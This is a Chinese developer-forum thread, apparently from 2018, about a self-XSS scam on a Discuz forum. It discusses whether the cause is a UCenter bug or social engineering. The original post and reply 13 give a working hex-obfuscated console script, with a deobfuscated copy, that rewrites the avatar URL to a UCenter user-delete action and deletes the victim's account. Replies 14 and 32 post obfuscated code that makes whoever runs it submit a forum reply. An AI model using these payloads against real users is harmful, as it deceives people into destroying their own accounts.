discuz 漏洞真 j8 多 有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了
Event · 2018-11-11 23:15:27 +08:00 via Android · 9301 次点击这是一个创建于 2203 天前的主题,其中的信息可能已经有所发展或是发生改变。
这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
废话不说。。。上代码 你们自己看看
location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
废话不说。。。上代码 你们自己看看
location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
 |
1
Event OP 具体账号发生了什么神奇的变化。。 你们自己试试看吧 我很无奈 。。
|
|
2
Event OP 而且貌似不是软层的。。。直接从 sql 层干掉了?
|
|
3
Event OP 哦对。。输完后退出帐号 重新登录才能看到效果
|
 |
5
suit 2018-11-11 23:29:37 +08:00
没有变化
|
|
9
Event OP @suit 我在 dz 的 oschina 里面找到了 issue。。。貌似是个 ucenter 的 bug
|
 |
12
ScotGu 2018-11-11 23:47:01 +08:00
|
 |
13
t6attack 2018-11-11 23:47:50 +08:00
location['href'] = ((d = (await(await fetch("./home.php?mod=spacecp&ac=avatar", {
credentials: 'include' }))['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')) && confirm('绿宝石')) ? d : ''; |
|
14
t6attack 2018-11-11 23:57:12 +08:00
让用户自己执行动作代码,这,,这算漏洞?!下面代码可以在 v2 执行
$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"](); |
 |
15
mengyaoss77 2018-11-12 00:01:33 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
16
dot2017 2018-11-12 00:01:37 +08:00  1
这个 bug 老早就有了,利用 uc 头像删除自己的账号。临时解决办法是切换到 H5 头像模式,X3.4 自带了
|
|
18
Event OP @mengyaoss77 是程序权限没控制好
|
 |
19
Perry 2018-11-12 00:03:48 +08:00 via iPhone
这是 social engineering 不是 bug
|
|
20
mengyaoss77 2018-11-12 00:04:41 +08:00
@Event #18 这是我执行 14 楼的代码自动回复的
 |
 |
22
airyland 2018-11-12 00:33:03 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
|
23
airyland 2018-11-12 00:34:07 +08:00
试了楼上的代码,自动发出回复了。。
|
 |
24
crab 2018-11-12 00:38:22 +08:00
|
|
25
crab 2018-11-12 00:38:36 +08:00 3
 |
 |
26
KasuganoSoras 2018-11-12 03:46:02 +08:00 via Android
这个 bug 老早就有了,我成功删了自己在很多论坛的账号。
不过我现在都自己开发论坛了,不用 Discuz |
 |
27
kzfile 2018-11-12 07:55:46 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
28
murmur 2018-11-12 08:09:25 +08:00
为什么那么多网站都在 console 里打东西提醒用户不要执行陌生人发来的代码
|
 |
29
ThirdFlame 2018-11-12 08:41:49 +08:00
人肉型 CSRF
|
 |
30
lixueyu001 2018-11-12 08:45:24 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
31
bojackhorseman 2018-11-12 08:49:18 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
32
v9ex 2018-11-12 08:51:32 +08:00
$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();
|
 |
33
Removable 2018-11-12 08:57:24 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
34
respect11 2018-11-12 08:58:39 +08:00 via iPhone
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
35
s527332935 2018-11-12 09:07:54 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
36
Lebal 2018-11-12 09:14:33 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
37
FakeLeung 2018-11-12 09:16:14 +08:00
location['href']=(
(d=(await(await fetch("./home.php?mod=spacecp&ac=avatar", {credentials: 'include'})['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')&&confirm('绿宝石'))?d:'';  来来来,大神们分析一下,这是 js 的问题还是后端的问题? @respect11 @Removable @bojackhorseman @lixueyu001 @airyland |
 |
38
autoxbc 2018-11-12 09:38:44 +08:00
其实是人的问题,在微利下人就失去理智,罔顾不懂的事情不要做的常识,跟技术没半点关系
|
 |
39
crystom 2018-11-12 10:22:43 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
40
cookii 2018-11-12 11:36:31 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
41
exceloo 2018-11-12 11:38:54 +08:00
这和 js 有半毛钱关系,只是诱导用户自己去删除帐号罢了。前端发的请求,js 都能模拟,用户自己作死去跑莫名其妙的代码你再牛逼也防不住啊。客户端执行的,又不是在服务端,还能咋办
|
 |
42
simple11 2018-11-12 11:43:36 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
44
hero2040407 2018-11-12 12:50:18 +08:00
所以说删除用户这种操作需要一个提醒吧,点一下就直接删掉了?
|
 |
46
coolloves 2018-11-12 13:19:52 +08:00
我擦,楼主好歹说下,运行的后果啊,我刚运行了下把我的账号给删掉了..................
|
 |
47
onionnews 2018-11-12 15:44:47 +08:00
想利用这个代码删掉那些论坛账号的,但是我执行了不管用,跳转到 500 了。是程序版本问题?
|
 |
48
kn007 2018-11-12 15:51:41 +08:00
好久前就见过了,DZ 一直没修复。
|
 |
49
roryzh 2018-11-12 16:08:09 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
50
Jiaming 2018-11-13 09:00:23 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
|
51
roryzh 2018-11-13 17:16:15 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
52
Fakey2 2018-12-07 12:21:48 +08:00
这不是漏洞,这只是诱导类似钓鱼了,安全意识薄弱的人才会上当,根本也不是 DZ 本身的漏洞。。。我让你在 console 执行你就执行,这不是傻子行为么。。。所以跟 DZ 本身没关系。。。
|
 |
53
xemtof 2019-01-09 18:59:34 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
54
771456556 2019-05-16 10:27:08 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
55
xmdhs 2020-02-26 22:17:41 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
 |
56
binnerchen 2020-11-29 13:10:48 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
Select Language